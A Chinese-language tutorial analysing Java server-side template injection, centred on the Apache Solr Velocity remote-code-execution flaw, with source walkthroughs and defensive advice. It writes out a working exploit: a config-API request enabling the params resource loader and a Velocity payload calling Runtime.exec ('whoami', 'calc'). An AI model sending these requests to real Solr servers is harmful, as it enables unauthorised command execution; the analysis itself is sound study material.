Java SSTI（服务端模板注入）漏洞深入分析与利用<\/h1>

一、SSTI基础概念<\/h2>

SSTI（Server-Side Template Injection）服务端模板注入是指在使用模板引擎渲染用户输入时，由于代码不规范或信任了用户输入而导致的注入漏洞。主要影响以下框架：<\/p>

Python框架<\/strong>：Jinja2、Mako、Tornado、Django<\/li>
PHP框架<\/strong>：Smarty、Twig<\/li>

Java框架<\/strong>：FreeMarker、Velocity、Jade<\/li> <\/ul>
二、Java SSTI漏洞原理<\/h2>
1. 漏洞示例代码<\/h3>
private<\/span> static<\/span> void<\/span> velocity<\/span>(<\/span>String template)<\/span> {<\/span> <\/span><\/span> Velocity.<\/span>init<\/span>();<\/span> <\/span><\/span> VelocityContext context =<\/span> new<\/span> VelocityContext();<\/span> <\/span><\/span> context.<\/span>put<\/span>(<\/span>"author"<\/span>,<\/span> "Elliot A."<\/span>);<\/span> <\/span><\/span> context.<\/span>put<\/span>(<\/span>"address"<\/span>,<\/span> "217 E Broadway"<\/span>);<\/span> <\/span><\/span> context.<\/span>put<\/span>(<\/span>"phone"<\/span>,<\/span> "555-1337"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> StringWriter swOut =<\/span> new<\/span> StringWriter();<\/span> <\/span><\/span> Velocity.<\/span>evaluate<\/span>(<\/span>context,<\/span> swOut,<\/span> "test"<\/span>,<\/span> template);<\/span> \/\/ 漏洞点 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 漏洞调用链分析<\/h3> Velocity.evaluate()<\/code> 调用 RuntimeSingleton.getRuntimeServices().evaluate()<\/code><\/li> 进入 RuntimeInstance<\/code> 类的 evaluate<\/code> 方法<\/li> 调用 parse()<\/code> 方法解析模板<\/li> 进入 render()<\/code> 方法渲染模板<\/li> 最终通过 execute()<\/code> 方法执行恶意代码<\/li> <\/ol> 3. 关键执行点<\/h3> 在 SimpleNode<\/code> 类的 execute<\/code> 方法中：<\/p> for<\/span>(<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> this<\/span>.<\/span>numChildren<\/span>;<\/span> ++<\/span>i)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>this<\/span>.<\/span>strictRef<\/span> &&<\/span> result ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> methodName =<\/span> this<\/span>.<\/span>jjtGetChild<\/span>(<\/span>i).<\/span>getFirstToken<\/span>().<\/span>image<\/span>;<\/span> <\/span><\/span> throw<\/span> new<\/span> VelocityException(<\/span>"Attempted to access '"<\/span> +<\/span> methodName +<\/span> "' on a null value..."<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> previousResult =<\/span> result;<\/span> <\/span><\/span> result =<\/span> this<\/span>.<\/span>jjtGetChild<\/span>(<\/span>i).<\/span>execute<\/span>(<\/span>result,<\/span> context);<\/span> \/\/ 关键执行点 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>result ==<\/span> null<\/span> &&<\/span> !<\/span>this<\/span>.<\/span>strictRef<\/span>)<\/span> {<\/span> <\/span><\/span> failedChild =<\/span> i;<\/span> <\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、Apache Solr Velocity模板注入漏洞分析<\/h2> 1. 漏洞复现步骤<\/h3> 修改配置<\/strong>：开启Velocity模板的params.resource.loader.enabled<\/code>选项<\/li> <\/ol> POST<\/span> \/solr\/test\/config HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1:8983<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "update-queryresponsewriter"<\/span>: { <\/span><\/span> "startup"<\/span>: "lazy"<\/span>, <\/span><\/span> "name"<\/span>: "velocity"<\/span>, <\/span><\/span> "class"<\/span>: "solr.VelocityResponseWriter"<\/span>, <\/span><\/span> "template.base.dir"<\/span>: ""<\/span>, <\/span><\/span> "solr.resource.loader.enabled"<\/span>: "true"<\/span>, <\/span><\/span> "params.resource.loader.enabled"<\/span>: "true"<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 执行恶意模板<\/strong><\/li> <\/ol> GET<\/span> \/solr\/test\/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1:8983<\/span> <\/span><\/span><\/code><\/pre>2. 漏洞分析<\/h3> Velocity模板引擎初始化<\/strong>：<\/p> 在VelocityResponseWriter<\/code>类中创建Velocity模板引擎<\/li> 通过SimpleNode<\/code>类处理模板指令<\/li> <\/ul> <\/li> 模板解析过程<\/strong>：<\/p> ASTSetDirective<\/code>处理#set<\/code>指令<\/li> ASTMethod<\/code>处理方法调用<\/li> ASTReference<\/code>处理变量引用<\/li> <\/ul> <\/li> RCE实现原理<\/strong>：<\/p> 通过#set<\/code>指令获取Runtime类<\/li> 调用getRuntime().exec()<\/code>执行系统命令<\/li> 使用#foreach<\/code>循环读取命令执行结果<\/li> <\/ul> <\/li> <\/ol> 四、Velocity模板语法详解<\/h2> 1. #set<\/code>语法<\/h3> #set($var = "value") \/\/ 简单赋值 #set($person.name = "value") \/\/ 相当于Java的setName方法 <\/code><\/pre> 2. #foreach<\/code>语法<\/h3> #foreach($child in $person.children) $child #end <\/code><\/pre> 内部实现：<\/p> 将集合封装为Iterator<\/li> 在context中临时创建三个变量： elementKey<\/code>：当前元素<\/li> counterName<\/code>：循环计数<\/li> hasNextName<\/code>：是否有下一个元素<\/li> <\/ul> <\/li> <\/ul> 五、POC构造原理<\/h2> 解码后的POC：<\/p> #set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('calc')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end <\/code><\/pre> 分步解析：<\/h3> 创建空字符串变量$x<\/code><\/li> 通过反射获取Runtime类<\/li> 获取Character和String类用于后续输出处理<\/li> 执行命令并等待完成<\/li> 获取命令输出流<\/li> 使用循环读取并输出所有结果<\/li> <\/ol> 六、防御措施<\/h2> 输入验证<\/strong>：<\/p> 严格过滤用户输入的模板内容<\/li> 禁止使用危险字符和关键字<\/li> <\/ul> <\/li> 配置安全<\/strong>：<\/p> 禁用危险的Velocity配置选项<\/li> 特别是params.resource.loader.enabled<\/code><\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 对Solr等系统配置API进行访问控制<\/li> 使用认证和授权机制<\/li> <\/ul> <\/li> 沙箱环境<\/strong>：<\/p> 使用安全的沙箱环境运行模板引擎<\/li> 限制可访问的Java类和方<\/li> <\/ul> <\/li> <\/ol> 七、学习资源推荐<\/h2> 国内资料：<\/h3> Python SSTI：Flask\/Jinja2模板注入绕过姿势<\/li> PHP SSTI：服务端模板注入攻击浅析<\/li> <\/ul> 国外资料：<\/h3> Server-Side Template Injection: RCE for the modern webapp<\/li> In-Depth FreeMarker Template Injection<\/li> <\/ul> 参考链接：<\/h3> Solr官方文档<\/li> Velocity模板引擎源码分析<\/li> 各种框架的模板结构对比<\/li> <\/ul>